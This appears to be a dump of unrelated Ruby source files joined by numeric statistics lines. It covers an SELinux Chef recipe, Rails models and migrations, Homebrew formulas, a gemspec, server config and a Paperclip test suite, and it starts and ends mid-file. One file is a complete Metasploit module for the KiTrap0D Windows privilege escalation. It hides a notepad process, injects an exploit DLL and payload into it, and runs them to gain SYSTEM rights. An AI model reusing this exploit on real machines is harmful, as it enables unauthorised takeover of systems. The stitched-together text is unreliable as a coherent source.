# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
include_recipe 'selinux::_common'
# semanage is not installed by default; we need to manually add it.
package "policycoreutils-python"
selinux_state "SELinux #{node['selinux']['state'].capitalize}" do
action node['selinux']['state'].downcase.to_sym
end
node['selinux']['booleans'].each do |boolean, value|
value = SELinuxServiceHelpers.selinux_bool(value)
unless value.nil?
script "boolean_#{boolean}" do
interpreter "bash"
code "setsebool -P #{boolean} #{value}"
not_if "getsebool #{boolean} |egrep -q \" #{value}\"$"
end
end
end
############################################
# Add all the fcontexts that are not
# already in semanage. Since adding
# them individually is painfully slow,
# we collect a list of all required
# fcontexts first, and then import them
# all at once.
# Get the current fcontexts. Throw out header lines and the like
cmd = Mixlib::ShellOut.new("/usr/sbin/semanage fcontext -ln | egrep '.+:.+:.+:.+'")
cmd.run_command
cmdout = cmd.stdout.lines
current_fcontexts = Hash[cmdout.map{ |line|
lineparts = line.split(' ')
context = lineparts.first
types = lineparts.last
result = nil
if not types.nil? then
# note that the fields in between may contain spaces, and thus may have
# been improperly split. We are only interested in the first and last
# field, though.
u,r,t,s = types.split(':')
if not t.nil? then
result = [context, t]
end
end
result
}
]
fcontexts = node['selinux']['fcontexts'].select { |fc,type| current_fcontexts[fc] != type }.map do |fc,type|
# special case handling: if the fc is /usr/lib(64)?/nagios/plugins/negate we need to use
# 'regular file' instead of 'all files' because that context already exists with the wrong
# value.
if fc == "/usr/lib(64)?/nagios/plugins/negate" then
# The syntax for the import command has changed in RH 7
if node.platform_version.to_f >= 7.0 then
"fcontext -a -f f -t #{type} '#{fc}'"
else
"fcontext -a -f 'regular file' -t #{type} '#{fc}'"
end
else
# "fcontext -a -f 'all files' -t #{type} '#{fc}'"
"fcontext -a -t #{type} '#{fc}'"
end
end
############################################
# Process all ports, similar to the fcontexts
#
# SEManage returns ports as context - protocol - port list
# The port list is a comma/space-separate list that contains
# either individual ports, or ranges of ports.
# For instance:
# zebra_port_t udp 2600-2604, 2606
# TODO: properly process port ranges
cmd = Mixlib::ShellOut.new("/usr/sbin/semanage port -ln")
cmd.run_command
cmdout = cmd.stdout.lines
current_ports = Hash.new
cmdout.each{ |line|
context,proto,portslist = line.split(' ',3)
ports = portslist.split(',').map{ |p| p.strip() }
current_ports[proto] = Hash.new if current_ports[proto].nil?
ports.each do |port|
current_ports[proto][port] = context
end
}
# For each port that needs an selinux context configured,
# check if it is already included in currports - if not,
# add a line to be imported by semanage.
node['selinux']['ports'].each do |proto,protoports|
ports = protoports.select{ |port,context|
current_ports[proto][port.to_s] != context rescue true
}.map{ |port,context|
"port -a -t #{context} -p #{proto} #{port}"
}
fcontexts = fcontexts | ports
end
if fcontexts.length > 0 then
importdata = fcontexts.join("\n")
script "Import selinux configs" do
interpreter "bash"
code "echo \"#{importdata}\" | semanage -i -"
end
end
| 31.240602 | 108 | 0.672443 |
acd90d9b8ad17455cdfbb0682d5696b9975ddd55 | 390 | module Mutant
class Mutator
class Node
# Mutator for super without parentheses
class ZSuper < self
handle(:zsuper)
private
# Emit mutations
#
# @return [undefined]
#
# @api private
#
def dispatch
emit_singletons
end
end # ZSuper
end # Node
end # Mutator
end # Mutant
| 15 | 45 | 0.517949 |
21d30cdd86e3ee44922d16c8779045bf5e72dc3c | 347 | class ResultDetail < StudyRelationship
def attribs
{
:recruitment_details => xml.xpath('//clinical_results').xpath('participant_flow').xpath('recruitment_details').children.text,
:pre_assignment_details => xml.xpath('//clinical_results').xpath('participant_flow').xpath('pre_assignment_details').children.text,
}
end
end
| 31.545455 | 137 | 0.737752 |
e866cdfbeec4c957bfe4fd540185bd3798af965f | 956 | # typed: true
module KubeDSL
class FieldRes
include StringHelpers
include RbiHelpers
attr_reader :name, :type, :required
alias_method :required?, :required
def initialize(name, type, required)
@name = name
@type = type
@required = required
end
def fields_to_ruby(_inflector)
["value_field :#{ruby_safe_name}"]
end
def fields_to_rbi(inflector)
[
"sig { params(val: T.nilable(#{rbi_type_for(@type)})).returns(#{rbi_type_for(@type)}) }",
"def #{ruby_safe_name}(val = nil); end\n"
]
end
def validations(_inflector)
[].tap do |result|
result << "validates :#{ruby_safe_name}, field: { format: :#{type} }, presence: #{required? ? 'true' : 'false'}"
end
end
def serialize_call(_inflector)
ruby_safe_name
end
private
def ruby_safe_name
@ruby_safe_name ||= unkeywordify(underscore(name))
end
end
end
| 21.244444 | 120 | 0.614017 |
1dab5f6c8a3ca2c2c91d7894c8eb77d55ddf5625 | 222 | require 'rails_helper'
RSpec.describe Friendship, type: :model do
describe 'Like' do
it { should belong_to(:sender) }
it { should belong_to(:receiver) }
it { should validate_presence_of(:status) }
end
end
| 22.2 | 47 | 0.698198 |
91b3e2fd23dae5da908c6d607ef4d76badfbc816 | 386 | class CreateUsers < ActiveRecord::Migration[5.2]
def change
create_table :users do |t|
t.string :username
t.string :phone_number
t.string :password_digest
t.string :openid
t.string :nickname
t.integer :sex
t.string :province
t.string :country
t.string :headimgurl
t.string :unionid
t.timestamps
end
end
end
| 20.315789 | 48 | 0.629534 |
6163f6b01882e4c0e5db245366fc852f16fcd024 | 521 | require 'formula'
class Sslscan < Formula
homepage 'https://github.com/rbsec/sslscan'
url 'https://github.com/rbsec/sslscan/archive/1.11.0-rbsec.tar.gz'
sha1 'f5b3600b33181097f0afd49a3d1e894948da3d9c'
version '1.11.0'
depends_on "openssl"
# Fix compilation and statically link against OpenSSL 1.0.2 rather than 1.0.1
#patch :DATA
def install
ENV.deparallelize
system "make"
bin.install "sslscan"
man1.install "sslscan.1"
end
test do
system "#{bin}/sslscan"
end
end
__END__
| 19.296296 | 79 | 0.708253 |
0155954db3e2bbb9cd517af5bae44ba9a154cf4c | 1,783 | # -*- encoding: utf-8 -*-
# stub: net-ftp 0.1.1 ruby lib
Gem::Specification.new do |s|
s.name = "net-ftp".freeze
s.version = "0.1.1"
s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
s.metadata = { "homepage_uri" => "https://github.com/ruby/net-ftp", "source_code_uri" => "https://github.com/ruby/net-ftp" } if s.respond_to? :metadata=
s.require_paths = ["lib".freeze]
s.authors = ["Shugo Maeda".freeze]
s.bindir = "exe".freeze
s.date = "2021-04-06"
s.description = "Support for the File Transfer Protocol.".freeze
s.email = ["[email protected]".freeze]
s.files = ["net/ftp.rb".freeze, "net/http.rb".freeze, "net/http/backward.rb".freeze, "net/http/exceptions.rb".freeze, "net/http/generic_request.rb".freeze, "net/http/header.rb".freeze, "net/http/proxy_delta.rb".freeze, "net/http/request.rb".freeze, "net/http/requests.rb".freeze, "net/http/response.rb".freeze, "net/http/responses.rb".freeze, "net/http/status.rb".freeze, "net/https.rb".freeze, "net/imap.rb".freeze, "net/pop.rb".freeze, "net/protocol.rb".freeze, "net/smtp.rb".freeze]
s.homepage = "https://github.com/ruby/net-ftp".freeze
s.licenses = ["Ruby".freeze, "BSD-2-Clause".freeze]
s.required_ruby_version = Gem::Requirement.new(">= 2.3.0".freeze)
s.rubygems_version = "3.2.15".freeze
s.summary = "Support for the File Transfer Protocol.".freeze
if s.respond_to? :specification_version then
s.specification_version = 4
end
if s.respond_to? :add_runtime_dependency then
s.add_runtime_dependency(%q<net-protocol>.freeze, [">= 0"])
s.add_runtime_dependency(%q<time>.freeze, [">= 0"])
else
s.add_dependency(%q<net-protocol>.freeze, [">= 0"])
s.add_dependency(%q<time>.freeze, [">= 0"])
end
end
| 50.942857 | 487 | 0.689288 |
79380fe289cc5e9e826d753a569ef1c523e60e1d | 1,252 | # This file should contain all the record creation needed to seed the database with its default values.
# The data can then be loaded with the rails db:seed command (or created alongside the database with db:setup).
#
# Examples:
#
# movies = Movie.create([{ name: 'Star Wars' }, { name: 'Lord of the Rings' }])
# Character.create(name: 'Luke', movie: movies.first)
Hotel.create({
name: 'K-9 Resort Daycare & Luxury Hotel',
location: 'New Jersey, USA',
activities: 'Swimming, Doggie Ice Cream Socials, Frisbee'
})
Hotel.create({
name: 'Jet Pet Resort',
location: 'Vancouver, Canada',
activities: 'Private dog walks, luxury pet spa offering doggy massages and manicures'
})
Hotel.create({
name: 'The Wags Club',
location: 'Georgia, USA',
activities: 'Swimming, Doggy Dances with music, pet concierge services'
})
Hotel.create({
name: 'Red Dog Atlanta',
location: 'Georgia, USA',
activities: 'Grooming and Spa services, Dog PJ and Ugly Sweater contests, Dog Tacos'
})
Hotel.create({
name: 'We Love Wags',
location: 'Seattle, USA',
activities: 'Dog park with pool, Doggy socials, Doggy treats stations'
})
| 29.116279 | 111 | 0.64377 |
ff2e19b5b37af685d217f60a1231c0b6f3f28dc4 | 233 | class ApplicationController < ActionController::Base
protect_from_forgery with: :exception
http_basic_authenticate_with name: "user", password: "user", except: [:index, :show]
def index
@articles = Article.all
end
end
| 23.3 | 86 | 0.746781 |
188bfbe73a305708acd9747f6d60f0f8be7bf4e8 | 3,567 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/post/windows/reflective_dll_injection'
require 'msf/core/exploit/exe'
require 'rex'
class MetasploitModule < Msf::Exploit::Local
Rank = GreatRanking
include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Post::Windows::ReflectiveDLLInjection
def initialize(info={})
super( update_info( info,
'Name' => 'Windows SYSTEM Escalation via KiTrap0D',
'Description' => %q{
This module will create a new session with SYSTEM privileges via the
KiTrap0D exlpoit by Tavis Ormandy. If the session is use is already
elevated then the exploit will not run. The module relies on kitrap0d.x86.dll,
and is not supported on x64 editions of Windows.
},
'License' => MSF_LICENSE,
'Author' => [
'Tavis Ormandy', # Original resesarcher and exploit creator
'HD Moore', # Port of Tavis' code to meterpreter module
'Pusscat', # Port of Tavis' code to meterpreter module
'OJ Reeves' # Port of meterpreter code to a windows local exploit
],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ],
'Targets' => [
[ 'Windows 2K SP4 - Windows 7 (x86)', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ]
],
'DefaultTarget' => 0,
'References' => [
[ 'CVE', '2010-0232' ],
[ 'MSB', 'MS10-015' ],
[ 'EDB', '11199' ],
[ 'URL', 'http://seclists.org/fulldisclosure/2010/Jan/341' ]
],
'DisclosureDate'=> "Jan 19 2010"
))
end
def check
# Validate platform architecture
if sysinfo["Architecture"] =~ /x64|WOW64/i
return Exploit::CheckCode::Safe
end
# Validate OS version
winver = sysinfo["OS"]
unless winver =~ /Windows 2000|Windows XP|Windows Vista|Windows 2003|Windows 2008|Windows 7/
return Exploit::CheckCode::Safe
end
return Exploit::CheckCode::Detected
end
def exploit
if is_system?
fail_with(Failure::None, 'Session is already elevated')
end
if check == Exploit::CheckCode::Safe
fail_with(Failure::NotVulnerable, "Exploit not available on this system.")
end
print_status("Launching notepad to host the exploit...")
process = client.sys.process.execute("notepad.exe", nil, {'Hidden' => true})
host_process = client.sys.process.open(process.pid, PROCESS_ALL_ACCESS)
print_good("Process #{process.pid} launched.")
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
library_path = ::File.join(Msf::Config.data_directory, "exploits",
"CVE-2010-0232", "kitrap0d.x86.dll")
library_path = ::File.expand_path(library_path)
print_status("Injecting exploit into #{process.pid} ...")
exploit_mem, offset = inject_dll_into_process(host_process, library_path)
print_status("Exploit injected. Injecting payload into #{process.pid}...")
payload_mem = inject_into_process(host_process, payload.encoded)
# invoke the exploit, passing in the address of the payload that
# we want invoked on successful exploitation.
print_status("Payload injected. Executing exploit...")
host_process.thread.create(exploit_mem + offset, payload_mem)
print_good("Exploit finished, wait for (hopefully privileged) payload execution to complete.")
end
end
| 35.316832 | 98 | 0.652369 |
ff662afe5e019df4f25c36ca76f7310bda62b8ce | 665 | require "rails_helper"
RSpec.feature "Bookmarking a post" do
let(:user) { create(:user) }
let(:post) { create(:post, user: user) }
scenario "signed-in user bookmarks a post successfully", js: true do
sign_in user
visit post_path(post)
within("#main-post") do
click_on "Bookmark"
expect(page).to have_button "Unbookmark"
click_on "Unbookmark"
expect(page).to have_button "Bookmark"
end
end
scenario "non-logged in user cannot bookmark a post", js: true do
visit post_path(post)
within("#main-post") do
click_on "Bookmark"
end
expect(page).to have_content("Sign in with Facebook")
end
end
| 24.62963 | 70 | 0.669173 |
ed70a045393d86f96151730d733f1746ea642fa9 | 1,658 | # Where our application lives. $RAILS_ROOT is defined in our Dockerfile.
app_path = ENV['RAILS_ROOT']
# Set the server's working directory
working_directory app_path
# Define where Unicorn should write its PID file
pid "/var/tmp/pids/unicorn.pid"
# Bind Unicorn to the container's default route, at port 3000
listen "0.0.0.0:3000"
# Define the number of workers Unicorn should spin up.
# A new Rails app just needs one. You would scale this
# higher in the future once your app starts getting traffic.
# See https://unicorn.bogomips.org/TUNING.html
worker_processes 1
# Make sure we use the correct Gemfile on restarts
before_exec do |server|
ENV['BUNDLE_GEMFILE'] = "#{app_path}/Gemfile"
end
# Speeds up your workers.
# See https://unicorn.bogomips.org/TUNING.html
preload_app true
#
# Below we define how our workers should be spun up.
# See https://unicorn.bogomips.org/Unicorn/Configurator.html
#
before_fork do |server, worker|
# the following is highly recomended for Rails + "preload_app true"
# as there's no need for the master process to hold a connection
if defined?(ActiveRecord::Base)
ActiveRecord::Base.connection.disconnect!
end
# Before forking, kill the master process that belongs to the .oldbin PID.
# This enables 0 downtime deploys.
old_pid = "#{server.config[:pid]}.oldbin"
if File.exists?(old_pid) && server.pid != old_pid
begin
Process.kill("QUIT", File.read(old_pid).to_i)
rescue Errno::ENOENT, Errno::ESRCH
# someone else did our job for us
end
end
end
after_fork do |server, worker|
if defined?(ActiveRecord::Base)
ActiveRecord::Base.establish_connection
end
end
| 29.087719 | 76 | 0.739445 |
ffe1b1f82f05c560be867c536bd7805dca567e70 | 3,540 | Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# Code is not reloaded between requests.
config.cache_classes = true
# Eager load code on boot. This eager loads most of Rails and
# your application in memory, allowing both threaded web servers
# and those relying on copy on write to perform better.
# Rake tasks automatically ignore this option for performance.
config.eager_load = true
# Full error reports are disabled and caching is turned on.
config.consider_all_requests_local = false
config.action_controller.perform_caching = true
# Disable serving static files from the `/public` folder by default since
# Apache or NGINX already handles this.
config.public_file_server.enabled = ENV['RAILS_SERVE_STATIC_FILES'].present?
# Enable serving of images, stylesheets, and JavaScripts from an asset server.
# config.action_controller.asset_host = 'http://assets.example.com'
# Specifies the header that your server uses for sending files.
# config.action_dispatch.x_sendfile_header = 'X-Sendfile' # for Apache
# config.action_dispatch.x_sendfile_header = 'X-Accel-Redirect' # for NGINX
# Mount Action Cable outside main process or domain
# config.action_cable.mount_path = nil
# config.action_cable.url = 'wss://example.com/cable'
# config.action_cable.allowed_request_origins = [ 'http://example.com', /http:\/\/example.*/ ]
# Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies.
config.force_ssl = true
# Use the lowest log level to ensure availability of diagnostic information
# when problems arise.
config.log_level = :debug
# Prepend all log lines with the following tags.
config.log_tags = [ :request_id ]
# Use a different cache store in production.
# config.cache_store = :mem_cache_store
# Use a real queuing backend for Active Job (and separate queues per environment)
# config.active_job.queue_adapter = :resque
# config.active_job.queue_name_prefix = "beacon-web-api_#{Rails.env}"
config.action_mailer.perform_caching = false
# Ignore bad email addresses and do not raise email delivery errors.
# Set this to true and configure the email server for immediate delivery to raise delivery errors.
# config.action_mailer.raise_delivery_errors = false
# Enable locale fallbacks for I18n (makes lookups for any locale fall back to
# the I18n.default_locale when a translation cannot be found).
config.i18n.fallbacks = true
# Send deprecation notices to registered listeners.
config.active_support.deprecation = :notify
# Use default logging formatter so that PID and timestamp are not suppressed.
config.log_formatter = ::Logger::Formatter.new
# Use a different logger for distributed setups.
# require 'syslog/logger'
# config.logger = ActiveSupport::TaggedLogging.new(Syslog::Logger.new 'app-name')
if ENV["RAILS_LOG_TO_STDOUT"].present?
logger = ActiveSupport::Logger.new(STDOUT)
logger.formatter = config.log_formatter
config.logger = ActiveSupport::TaggedLogging.new(logger)
end
# Do not dump schema after migrations.
config.active_record.dump_schema_after_migration = false
config.paperclip_defaults = {
storage: :s3,
s3_region: ENV["AWS_REGION"],
s3_credentials: {
s3_host_name: ENV["S3_HOSTNAME"],
bucket: "beaconoid",
access_key_id: ENV["ACCESS_KEY_ID"],
secret_access_key: ENV["SECRET_ACCESS_KEY"]
}
}
end
| 39.333333 | 100 | 0.748023 |
7a93d0a9620f6ded8202e4d05e8d738e985e5014 | 1,947 | class CenterIm < Formula
desc "Text-mode multi-protocol instant messaging client"
homepage "http://www.centerim.org/index.php/Main_Page"
url "http://www.centerim.org/download/releases/centerim-4.22.10.tar.gz"
sha256 "93ce15eb9c834a4939b5aa0846d5c6023ec2953214daf8dc26c85ceaa4413f6e"
revision 1
bottle do
revision 1
sha256 "315556554c3e5b972b0d99145fd6d0971837c2bbd981b849ca89e7a9c069335b" => :el_capitan
sha256 "5a51f0130fcd601aeed50ae6f66008aaa0ec96f6ac3e7bc828b627f04b46b9f2" => :yosemite
sha256 "673992c76745d9509dd32e71c964946018584db447b37d02a21f332b508c619d" => :mavericks
sha256 "934ab216ab1f6eb9033cfb1bbbe720f2a7fa5190eb64c245d2140694c832a965" => :mountain_lion
end
depends_on "pkg-config" => :build
depends_on "gettext"
depends_on "openssl"
depends_on "jpeg" => :optional
# Fix build with clang; 4.22.10 is an outdated release and 5.0 is a rewrite,
# so this is not reported upstream
patch :DATA
patch :p0 do
url "https://raw.githubusercontent.com/Homebrew/formula-patches/677cb38/center-im/patch-libjabber_jconn.c.diff"
sha256 "ed8d10075c23c7dec2a782214cb53be05b11c04e617350f6f559f3c3bf803cfe"
end
def install
system "./configure", "--disable-dependency-tracking",
"--prefix=#{prefix}",
"--disable-msn",
"--with-openssl=#{Formula["openssl"].opt_prefix}"
system "make", "install"
# /bin/gawk does not exist on OS X
inreplace bin/"cimformathistory", "/bin/gawk", "/usr/bin/awk"
end
test do
assert_match /trillian/, shell_output("#{bin}/cimconv")
end
end
__END__
diff --git a/libicq2000/libicq2000/sigslot.h b/libicq2000/libicq2000/sigslot.h
index b7509c0..024774f 100644
--- a/libicq2000/libicq2000/sigslot.h
+++ b/libicq2000/libicq2000/sigslot.h
@@ -82,6 +82,7 @@
#ifndef SIGSLOT_H__
#define SIGSLOT_H__
+#include <cstdlib>
#include <set>
#include <list>
| 33 | 115 | 0.724191 |
ab41f7c600527d8ae82488ebf7b855399841a26e | 2,377 | =begin
#Scubawhere API Documentation
#This is the documentation for scubawhere's RMS API. This API is only to be used by authorized parties with valid auth tokens. [Learn about scubawhere](http://www.scubawhere.com) to become an authorized consumer of our API
OpenAPI spec version: 1.0.0
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
=end
require 'spec_helper'
require 'json'
require 'date'
# Unit tests for SwaggerClient::Session
# Automatically generated by swagger-codegen (github.com/swagger-api/swagger-codegen)
# Please update as you see appropriate
describe 'Session' do
before do
# run before each test
@instance = SwaggerClient::Session.new
end
after do
# run after each test
end
describe 'test an instance of Session' do
it 'should create an instact of Session' do
expect(@instance).to be_instance_of(SwaggerClient::Session)
end
end
describe 'test attribute "id"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "trip"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "start"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "boat"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "timetable_id"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
end
| 30.474359 | 224 | 0.737905 |
b93c266927c72ee863a2cd9ac856bcd303935977 | 678 | # frozen_string_literal: true
module Zoho
module People
class Attendance
attr_reader :check_in, :check_out, :email
def initialize(email:, check_in:, check_out:)
raise ArgumentError, 'check_in must be DateTime instance' unless check_in.is_a?(DateTime)
raise ArgumentError, 'check_out must be DateTime instance' unless check_out.is_a?(DateTime)
@email = email
@check_in = check_in
@check_out = check_out
end
def to_s
"attendance from #{format(check_in)} to #{format(check_out)}"
end
private
def format(datetime)
datetime.strftime('%F@%H:%M')
end
end
end
end
| 23.37931 | 99 | 0.644543 |
870ae8d69baf2adbf6858fa20481212e4f17b59c | 543 | # frozen_string_literal: true
# typed: strict
class Other::OtherClass
Foo::Bar::Exists.hello # This ref still works
Foo::Bar::Exists.helloXX
# ^^^^^^^ error: Method `helloXX` does not exist on `T.class_of(Foo::Bar::Exists)`
Foo::Bar::NotDefined
# ^^^^^^^^^^^^^^^^^^^^ error: Unable to resolve constant `NotDefined`
Foo::Bar::NotDefined.xxx
# ^^^^^^^^^^^^^^^^^^^^ error: Unable to resolve constant `NotDefined`
Foo::Bar::NotDefined::Deeper
# ^^^^^^^^^^^^^^^^^^^^ error: Unable to resolve constant `NotDefined`
end
| 31.941176 | 99 | 0.618785 |
1ab6a01b20a5353dc0bd885db181951d1001307e | 1,209 | require "erb"
module YmTags::Tag
include ERB::Util
def self.included(base)
base.scope :contexts, lambda {|contexts| base.joins(:taggings).where(["taggings.context IN (?)", [*contexts]]).group('tags.id')}
base.scope :most_used, lambda { base.joins(:taggings).select("tags.*, COUNT(taggings.id) as tag_count").order('tag_count DESC').group('tags.id') }
base.scope :for_post_target, lambda {|target| base.joins(:taggings).joins("INNER JOIN posts ON (taggable_id = posts.id AND taggable_type = 'Post')").where(["posts.target_type = ? AND posts.target_id = ?", target.class.to_s, target.id])}
base.send(:extend, ClassMethods)
end
module ClassMethods
def tag_list_options(contexts, resource, tags = nil)
tags ||= self.contexts(contexts)
resource_tags = [*contexts].collect {|context| resource.send("#{context.to_s.singularize}_list")}
(tags.collect(&:name) + resource_tags.flatten).uniq.sort
end
end
def to_s
if ActsAsTaggableOn::TagList.force_parameterize
name.gsub("-", " ")
else
name
end
end
def to_param
url_encoded_name = name_was.blank? ? u(name) : u(name_was)
url_encoded_name.gsub(".", "%2E")
end
end | 36.636364 | 240 | 0.674938 |
e288a8f084513e0e50f97007383b8b47e7c32c7e | 8,183 | require './test/helper'
class GeometryTest < Test::Unit::TestCase
context "Paperclip::Geometry" do
should "correctly report its given dimensions" do
assert @geo = Paperclip::Geometry.new(1024, 768)
assert_equal 1024, @geo.width
assert_equal 768, @geo.height
end
should "set height to 0 if height dimension is missing" do
assert @geo = Paperclip::Geometry.new(1024)
assert_equal 1024, @geo.width
assert_equal 0, @geo.height
end
should "set width to 0 if width dimension is missing" do
assert @geo = Paperclip::Geometry.new(nil, 768)
assert_equal 0, @geo.width
assert_equal 768, @geo.height
end
should "be generated from a WxH-formatted string" do
assert @geo = Paperclip::Geometry.parse("800x600")
assert_equal 800, @geo.width
assert_equal 600, @geo.height
end
should "be generated from a xH-formatted string" do
assert @geo = Paperclip::Geometry.parse("x600")
assert_equal 0, @geo.width
assert_equal 600, @geo.height
end
should "be generated from a Wx-formatted string" do
assert @geo = Paperclip::Geometry.parse("800x")
assert_equal 800, @geo.width
assert_equal 0, @geo.height
end
should "be generated from a W-formatted string" do
assert @geo = Paperclip::Geometry.parse("800")
assert_equal 800, @geo.width
assert_equal 0, @geo.height
end
should "ensure the modifier is nil if not present" do
assert @geo = Paperclip::Geometry.parse("123x456")
assert_nil @geo.modifier
end
should "treat x and X the same in geometries" do
@lower = Paperclip::Geometry.parse("123x456")
@upper = Paperclip::Geometry.parse("123X456")
assert_equal 123, @lower.width
assert_equal 123, @upper.width
assert_equal 456, @lower.height
assert_equal 456, @upper.height
end
['>', '<', '#', '@', '%', '^', '!', nil].each do |mod|
should "ensure the modifier #{mod.inspect} is preserved" do
assert @geo = Paperclip::Geometry.parse("123x456#{mod}")
assert_equal mod, @geo.modifier
assert_equal "123x456#{mod}", @geo.to_s
end
end
['>', '<', '#', '@', '%', '^', '!', nil].each do |mod|
should "ensure the modifier #{mod.inspect} is preserved with no height" do
assert @geo = Paperclip::Geometry.parse("123x#{mod}")
assert_equal mod, @geo.modifier
assert_equal "123#{mod}", @geo.to_s
end
end
should "make sure the modifier gets passed during transformation_to" do
assert @src = Paperclip::Geometry.parse("123x456")
assert @dst = Paperclip::Geometry.parse("123x456>")
assert_equal ["123x456>", nil], @src.transformation_to(@dst)
end
should "generate correct ImageMagick formatting string for W-formatted string" do
assert @geo = Paperclip::Geometry.parse("800")
assert_equal "800", @geo.to_s
end
should "generate correct ImageMagick formatting string for Wx-formatted string" do
assert @geo = Paperclip::Geometry.parse("800x")
assert_equal "800", @geo.to_s
end
should "generate correct ImageMagick formatting string for xH-formatted string" do
assert @geo = Paperclip::Geometry.parse("x600")
assert_equal "x600", @geo.to_s
end
should "generate correct ImageMagick formatting string for WxH-formatted string" do
assert @geo = Paperclip::Geometry.parse("800x600")
assert_equal "800x600", @geo.to_s
end
should "be generated from a file" do
file = fixture_file("5k.png")
file = File.new(file, 'rb')
assert_nothing_raised{ @geo = Paperclip::Geometry.from_file(file) }
assert @geo.height > 0
assert @geo.width > 0
end
should "be generated from a file path" do
file = fixture_file("5k.png")
assert_nothing_raised{ @geo = Paperclip::Geometry.from_file(file) }
assert @geo.height > 0
assert @geo.width > 0
end
should "not generate from a bad file" do
file = "/home/This File Does Not Exist.omg"
assert_raise(Paperclip::Errors::NotIdentifiedByImageMagickError){ @geo = Paperclip::Geometry.from_file(file) }
end
should "not generate from a blank filename" do
file = ""
assert_raise(Paperclip::Errors::NotIdentifiedByImageMagickError){ @geo = Paperclip::Geometry.from_file(file) }
end
should "not generate from a nil file" do
file = nil
assert_raise(Paperclip::Errors::NotIdentifiedByImageMagickError){ @geo = Paperclip::Geometry.from_file(file) }
end
should "not generate from a file with no path" do
file = mock("file", :path => "")
file.stubs(:respond_to?).with(:path).returns(true)
assert_raise(Paperclip::Errors::NotIdentifiedByImageMagickError){ @geo = Paperclip::Geometry.from_file(file) }
end
should "let us know when a command isn't found versus a processing error" do
old_path = ENV['PATH']
begin
ENV['PATH'] = ''
assert_raises(Paperclip::Errors::CommandNotFoundError) do
file = fixture_file("5k.png")
@geo = Paperclip::Geometry.from_file(file)
end
ensure
ENV['PATH'] = old_path
end
end
[['vertical', 900, 1440, true, false, false, 1440, 900, 0.625],
['horizontal', 1024, 768, false, true, false, 1024, 768, 1.3333],
['square', 100, 100, false, false, true, 100, 100, 1]].each do |args|
context "performing calculations on a #{args[0]} viewport" do
setup do
@geo = Paperclip::Geometry.new(args[1], args[2])
end
should "#{args[3] ? "" : "not"} be vertical" do
assert_equal args[3], @geo.vertical?
end
should "#{args[4] ? "" : "not"} be horizontal" do
assert_equal args[4], @geo.horizontal?
end
should "#{args[5] ? "" : "not"} be square" do
assert_equal args[5], @geo.square?
end
should "report that #{args[6]} is the larger dimension" do
assert_equal args[6], @geo.larger
end
should "report that #{args[7]} is the smaller dimension" do
assert_equal args[7], @geo.smaller
end
should "have an aspect ratio of #{args[8]}" do
assert_in_delta args[8], @geo.aspect, 0.0001
end
end
end
[[ [1000, 100], [64, 64], "x64", "64x64+288+0" ],
[ [100, 1000], [50, 950], "x950", "50x950+22+0" ],
[ [100, 1000], [50, 25], "50x", "50x25+0+237" ]]. each do |args|
context "of #{args[0].inspect} and given a Geometry #{args[1].inspect} and sent transform_to" do
setup do
@geo = Paperclip::Geometry.new(*args[0])
@dst = Paperclip::Geometry.new(*args[1])
@scale, @crop = @geo.transformation_to @dst, true
end
should "be able to return the correct scaling transformation geometry #{args[2]}" do
assert_equal args[2], @scale
end
should "be able to return the correct crop transformation geometry #{args[3]}" do
assert_equal args[3], @crop
end
end
end
[['256x256', '150x150!' => [150, 150], '150x150#' => [150, 150], '150x150>' => [150, 150], '150x150<' => [256, 256], '150x150' => [150, 150]],
['256x256', '512x512!' => [512, 512], '512x512#' => [512, 512], '512x512>' => [256, 256], '512x512<' => [512, 512], '512x512' => [512, 512]],
['600x400', '512x512!' => [512, 512], '512x512#' => [512, 512], '512x512>' => [512, 341], '512x512<' => [600, 400], '512x512' => [512, 341]]].each do |original_size, options|
options.each_pair do |size, dimensions|
context "#{original_size} resize_to #{size}" do
setup do
@source = Paperclip::Geometry.parse original_size
@new_geometry = @source.resize_to size
end
should "have #{dimensions.first} width" do
assert_equal dimensions.first, @new_geometry.width
end
should "have #{dimensions.last} height" do
assert_equal dimensions.last, @new_geometry.height
end
end
end
end
end
end
| 36.207965 | 179 | 0.6164 |
ff0a52c9f777dab3d09e74fa8f3e8ada2f37d3ee | 410 | # typed: true
class CreateReleasePublishers < ActiveRecord::Migration[5.2]
def change
create_table :release_publishers do |t|
t.references :release, null: false
t.references :company, null: false
t.timestamps
end
add_foreign_key :release_publishers, :releases,
on_delete: :cascade
add_foreign_key :release_publishers, :companies,
on_delete: :cascade
end
end
| 24.117647 | 60 | 0.709756 |
e2deb307d6016aa189802665a1bd7694c0c1f228 | 697 | module Players
module Suppression
def suppress_guns?
@suppress_guns || zone.suppress_guns
end
